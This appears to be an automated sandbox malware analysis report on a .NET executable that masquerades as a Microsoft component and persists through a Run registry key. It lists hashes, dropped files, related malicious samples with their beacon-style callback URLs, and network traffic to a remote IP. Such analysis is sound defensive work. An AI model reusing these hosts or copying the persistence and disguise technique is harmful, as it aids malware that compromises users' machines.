Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 104.43.139.144, 23.210.248.85, 51.104.144.132, 205.185.216.10, 205.185.216.42, 40.67.251.132, 20.54.26.129, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report creation exceeded maximum time and may have missing disassembly code information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:32:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"
16:32:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run firefoxe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
184.168.131.241	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	www.crestviewlab.com/gyo3/?Ez=NAGhR2B897xHmSjBg9ib6asY38nnY4Q4yyZMB+Gj9us/EkxfPSnFK1AIwmtjw0HkqurxQu+N+g==&lhud=TjfdU2S
	MV.KMTC JEBEL ALI_pdf.exe	Get hash	malicious	Browse	www.carwashcustom.com/y9z/?uFQl=fY5jeAtp1RdNWaxm5n6iTAw0V/8P2zZ8OtxyEaiRQwZkZsJ+cMlcko/IfBrIT9W4DRCI&CTvp=fv10_lYhrxJtW6
	PO0119-1620 LQSB 0320 Siemens.exe	Get hash	malicious	Browse	www.fluidartindia.com/sppe/?DnadT=jX6zF4/w1i207zkr1riL1VOogE6y0WgJJqDlfpP213KajKiR8CXisvGZ1eNGgJa3LVxH&DxlLi=2dmX
	PROOF OF PAYMENT.exe	Get hash	malicious	Browse	www.fastsalvage.com/mua8/?nflpdH=B0qyrwayxD8wcQG3Qbr3RYD+R2QNZFulkGJHcFvF3VxCu8MwJpoGpma0wXvOyVIO8Q3D&w48t=0pY022IXUBwLfpfP
	POSH XANADU Order-SP-20-V241e.xlsx	Get hash	malicious	Browse	www.upgradetomastery.com/dtn/?8ptdvJ=KT0pXTAPFjE0&lb=VKiUsABvcSkQZcVKnfuC8vDN1G6FwU6V98eOKuQh0UKncmK0g9i99ZESG6mkSNKYPbsfxw==
	jrzlwOa0UC.exe	Get hash	malicious	Browse	www.enerjikbilin.com/t4vo/?Dxlpd=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2U01Umj+Zu9uG7hEQ==&lhuh=TxlhfFN
	PDF ICITIUS33BUD10307051120003475.exe	Get hash	malicious	Browse	www.applywithrand.com/iic6/?DV8TCr-=yPIpthC5MtqHoy4c0EHwGIh2/j/8JQggFFSPND+1HWd+sJXvHNRkMzNQskTglzxbquBo&U0DH6=kf50d0Dh3Z44mV
	Invoice.exe	Get hash	malicious	Browse	www.forsythcourtseniorliving.com/rhk/?2dtd9h=mjpPyjuxPhk0&3f=zT6q1JDKfhV2EvEX8/2jysHCuf0tBNhQsP2YiyzGtHytBzTfjT3OdZVqaOBr+/tLjoXCZ7lNZQ==
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.qubitlaboratories.com/o9b2/?J484=xPJtLXbX&u6u4=3LGybaBE5u/MmrsyhaNWg7uW/vPINQPoFsX0YN7a6o2wuLOqT6PUoiZZCA7i0eNZ3qK2
	Invoice.exe	Get hash	malicious	Browse	www.bitcoincandy.xyz/hko6/?7nE8Zrx=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKD9kUp/tb+4v&LXed=XPUxDVP8ThYHYxS0
	ALPHA_PO_16201844580.exe	Get hash	malicious	Browse	www.timberlinepallets.com/ihj8/?FDHH=Cnt+6nHyGXRUU+110cZEsnWWKj+9Yye+cLBJL0AmBtVe9ccrmOicj2d+yDCCaYm3sR4n&Rl=VtxXE
	QFCPrfsJLeeYpN5.exe	Get hash	malicious	Browse	www.outsourcedbim.com/k8b/
	nnnf.exe	Get hash	malicious	Browse	www.cheap-housekeeping.com/bns/?uVg8=DFuD2CwFEFTZMlFq3QqcpFj8rgjdPttxv8Nv7PXL+ekRjc0K8Zw+qc+ng0ER0qX/SACF&R48Hj=NtxpKjcxbp2XFTE
	iz06VVmz0l.exe	Get hash	malicious	Browse	www.maskupforschool.com/d8h/?rVOp32=b4AuRmO5mJIYTa03Ryq3knCjLs8pOUSKEouWqDiq2O5vgkJvPoAU5b8ioX3ikWgjFYnw&GV2p=8pMx2630Gf6TGP
	0VikCnzrVT.exe	Get hash	malicious	Browse	www.enerjikbilin.com/t4vo/?2db=X48HMfxHf&-Z8=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np2UNqlGgwPy6uG7mXg==
	New Additional Agreement - Commercial and Technical Proposal for Supply.exe	Get hash	malicious	Browse	www.dentonparalegals.com/bw82/?tVm0=DrsoiajnQdnXVIU/gL2U5CLusm9v5BrmFGY2mUU9NwKfyFU9+RZid9vo/OyzH4K2w5lEorrqfA==&U4kp=Ntx4URGPjVrdVrx
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	www.dentonparalegals.com/bw82/?RR=DrsoiajnQdnXVIU/gL2U5CLusm9v5BrmFGY2mUU9NwKfyFU9+RZid9vo/OyzH4K2w5lEorrqfA==&E6A=8pMPQv
	ORDER 20200717-019.exe	Get hash	malicious	Browse	www.autokouluhaapalainen.com/svh9/?lZ3=fjnpVFfxOD2&D8S=sgrU0uWM3R9oNhmUUypjEsSXdQLL1THxdgQkCyVGvGZbR0orT1tg9H1luYchBJO1oel5jSmuSA==
	http://149.129.50.37/	Get hash	malicious	Browse	www.proxywiki.org/pub/Support/FAQ/pwbtn.gif
	PI210941.exe	Get hash	malicious	Browse	www.enerjikbilin.com/t4vo/?o2J=zukTNKzNObihvOlNQP8dibmkyr3w1VW9LXTzCAncEay1uwCtweD+d3+np14O2VKY9uPs&4h0=vZR8DbS8Z4yXah
198.185.159.141	NEW PO.exe	Get hash	malicious	Browse	www.pharmacymillwork.com/sbmh/?pPE=QetpKiLtmyz1LeM7dHiGsBNA/OD0ioqbSKhtijaCssQV8Cp1A0yk54z8I+AGFYuSeeOvrJLfeA==&-Zi=V48LDDzx
198.185.159.141	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	www.yourmatch.club/dn87/?D818=38AK/AHgtArI3vIGuczJM2geIxEZ/6YOh3hqbZK51swbGhAkUhePPwhzVXw1NVydmPq5&uTuD=ApdlgZ4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ext-sq.squarespace.com	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	198.49.23.141
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	198.49.23.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	198.49.23.141
	dB7XQuemMc.exe	Get hash	malicious	Browse	198.49.23.141
	hRVrTsMv25.exe	Get hash	malicious	Browse	198.49.23.141
	v6k2UHU2xk.exe	Get hash	malicious	Browse	198.185.159.141
	NzI1oP5E74.exe	Get hash	malicious	Browse	198.49.23.141
	PO.exe	Get hash	malicious	Browse	198.49.23.141
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	198.185.159.141
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	198.49.23.141
	scnn7676766.exe	Get hash	malicious	Browse	198.185.159.144
	price quote.exe	Get hash	malicious	Browse	198.185.159.145
	t64.exe	Get hash	malicious	Browse	198.185.159.144
	Preview_Annual.xlsb	Get hash	malicious	Browse	198.49.23.145
	Se adjunta un nuevo pedido.exe	Get hash	malicious	Browse	198.49.23.145
	wPthy7dafVcH94f.exe	Get hash	malicious	Browse	198.49.23.144
	54nwZp1aPg.exe	Get hash	malicious	Browse	198.49.23.144
	uiy3OAYIpt.exe	Get hash	malicious	Browse	198.185.159.144
	zisuzZpoW2.exe	Get hash	malicious	Browse	198.49.23.145

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SQUARESPACEUS	BANK ACCOUNT INFO!.exe	Get hash	malicious	Browse	198.49.23.141
	http://WWW.ALYSSA-J-MILANO.COM	Get hash	malicious	Browse	198.185.159.141
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	198.49.23.141
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	198.49.23.177
	http://f69e.engage.squarespace-mail.com	Get hash	malicious	Browse	198.49.23.141
	NEW PO.exe	Get hash	malicious	Browse	198.185.159.141
	p8LV1eVFyO.exe	Get hash	malicious	Browse	198.49.23.177
	dB7XQuemMc.exe	Get hash	malicious	Browse	198.49.23.141
	hRVrTsMv25.exe	Get hash	malicious	Browse	198.49.23.141
	qkN4OZWFG6.exe	Get hash	malicious	Browse	198.185.159.144
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	198.185.159.144
	NzI1oP5E74.exe	Get hash	malicious	Browse	198.49.23.141
	IQtvZjIdhN.exe	Get hash	malicious	Browse	198.49.23.177
	PO.exe	Get hash	malicious	Browse	198.49.23.141
	148wWoi8vI.exe	Get hash	malicious	Browse	198.49.23.177
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	198.185.159.141
	KZ7qjnBlZF.exe	Get hash	malicious	Browse	198.49.23.141
	scnn7676766.exe	Get hash	malicious	Browse	198.185.159.144
	price quote.exe	Get hash	malicious	Browse	198.185.159.145
	t64.exe	Get hash	malicious	Browse	198.185.159.144
AS-26496-GO-DADDY-COM-LLCUS	PURCHASE ORDER.exe	Get hash	malicious	Browse	166.62.27.57
	USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE	Get hash	malicious	Browse	192.186.237.168
	BANK-STATMENT _xlsx.exe	Get hash	malicious	Browse	166.62.27.57
	Purchase Order 40,7045.exe	Get hash	malicious	Browse	198.71.232.3
	Payment Advice - Advice Ref GLV823990339.exe	Get hash	malicious	Browse	184.168.131.241
	MV.KMTC JEBEL ALI_pdf.exe	Get hash	malicious	Browse	184.168.131.241
	PO0119-1620 LQSB 0320 Siemens.exe	Get hash	malicious	Browse	184.168.131.241
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	192.186.237.168
	http://homeschoolingteen.com	Get hash	malicious	Browse	107.180.51.106
	http://p3nlhclust404.shr.prod.phx3.secureserver.net	Get hash	malicious	Browse	72.167.191.65
	INQUIRY.exe	Get hash	malicious	Browse	166.62.27.57
	moses.exe	Get hash	malicious	Browse	148.66.138.196
	PROOF OF PAYMENT.exe	Get hash	malicious	Browse	184.168.131.241
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	184.168.131.241
	https://j.mp/38NwiZZ	Get hash	malicious	Browse	107.180.26.71
	POSH XANADU Order-SP-20-V241e.xlsx	Get hash	malicious	Browse	184.168.131.241
	https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304	Get hash	malicious	Browse	198.71.233.138
	https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304	Get hash	malicious	Browse	198.71.233.138
	anthony.exe	Get hash	malicious	Browse	107.180.4.22
	https://sailingfloridakeys.com/Guarantee/	Get hash	malicious	Browse	104.238.92.18

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kayx.exe.log Download File
Process:	C:\Users\user\Desktop\kayx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Download File
Process:	C:\Users\user\Desktop\kayx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	432640
Entropy (8bit):	7.899249270813086
Encrypted:	false
SSDEEP:	6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
MD5:	A80E73A824B655491F54278B7A29467D
SHA1:	F33DDFFC223C9AFA4E226D3567B990A8E44828E6
SHA-256:	BDCD13ABDDED8F4F709FB288FB78B4AFFF486854B3EA78AD378D11220A31C3C4
SHA-512:	382DE45D9EFB0214BAEDDF26645A1858E5FF8A5090CFC1FCBCB552C03D69B1D0B78DE7833D7CEAFAFDE29CCF38B974E2D691EFF9249140BCB013E88EE15B482D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z._.................L...L.......i... ........@.. ....................................@..................................i..J.......VI........................................................................... ............... ..H............text....J... ...L.................. ..`.rsrc...VI.......J...N..............@..@.reloc..............................@..B.................i......H.......@w...8......F...................................................N+.+.(....+.(X...+...(.....~......+.......+..~......+.......+...(......(......(......(......(......(......(......(......(.....+.+.+.+.+...c+..+..+.(K...+..+..+.(K...+...+'{....{m...+.{}...+.. ...._+.{z...+..+.*.+..+..+..+..+.(....+..0..........8....{?...8....8....8....{@...1.8....{@.....+)8....{?...8....{@...Y8.....-6X ...._8.......,...-..Y...1#.{>... .....Y...(.....-...X...,"....{>.....Y.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\kayx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.899249270813086
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	kayx.exe
File size:	432640
MD5:	a80e73a824b655491f54278b7a29467d
SHA1:	f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256:	bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
SHA512:	382de45d9efb0214baeddf26645a1858e5ff8a5090cfc1fcbcb552c03d69b1d0b78de7833d7ceafafde29ccf38b974e2d691eff9249140bcb013e88ee15b482d
SSDEEP:	6144:2k6/GQOb8Jv8lhFf3cbXPFF7pnWtZBkPsMQ3GYYm5O3iMEbSpchQZd/l:2f/GDAJEn9crPFFFnWvLNBbSpZdd
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z._.................L...L.......i... ........@.. ....................................@................................

File Icon


Icon Hash:	031c185e1a2e4608

Static PE Info

General
Entrypoint:	0x4669fc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB67AE0 [Thu Nov 19 14:02:08 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x669b2	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x68000	0x4956	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x64a02	0x64c00	False	0.957082137872	data	7.94131868162	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x68000	0x4956	0x4a00	False	0.173880912162	data	4.22602262855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x6806c	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294440951, next used block 4294440951
RT_GROUP_ICON	0x6c2d0	0x14	data
RT_VERSION	0x6c320	0x410	data
RT_MANIFEST	0x6c76c	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Microsoft Corporation. All rights reserved.
Assembly Version	6.1.7601.23834
InternalName	Vdltohs3.exe
FileVersion	6.1.7601.23834
CompanyName	Microsoft Corporation
Comments	Microsoft Help and Support
ProductName	Microsoft Windows Operating System
ProductVersion	6.1.7601.23834
FileDescription	Microsoft Help and Support
OriginalFilename	Vdltohs3.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 16:33:34.725390911 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.833197117 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.833364964 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.833543062 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.939563990 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.942893982 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.942939043 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.942975044 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943013906 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943033934 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.943052053 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943069935 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.943099976 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943140984 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943152905 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.943180084 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943217993 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943233013 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:34.943255901 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:34.943304062 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049237967 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049300909 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049339056 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049398899 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049405098 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049458027 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049479961 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049498081 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049535036 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049559116 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049573898 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049614906 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049655914 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049662113 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049705029 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049729109 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049746037 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049784899 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049823999 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049860001 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049885988 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049890041 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049921036 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049959898 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.049962044 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.049997091 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.050026894 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.050059080 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.050115108 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156137943 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156202078 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156243086 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156280041 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156281948 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156321049 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156368971 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156411886 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156423092 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156443119 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156450987 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156490088 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156511068 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156527042 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156563997 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156582117 CET	49743	80	192.168.2.3	198.185.159.141
Nov 20, 2020 16:33:35.156601906 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156641006 CET	80	49743	198.185.159.141	192.168.2.3
Nov 20, 2020 16:33:35.156666994 CET	49743	80	192.168.2.3	198.185.159.141
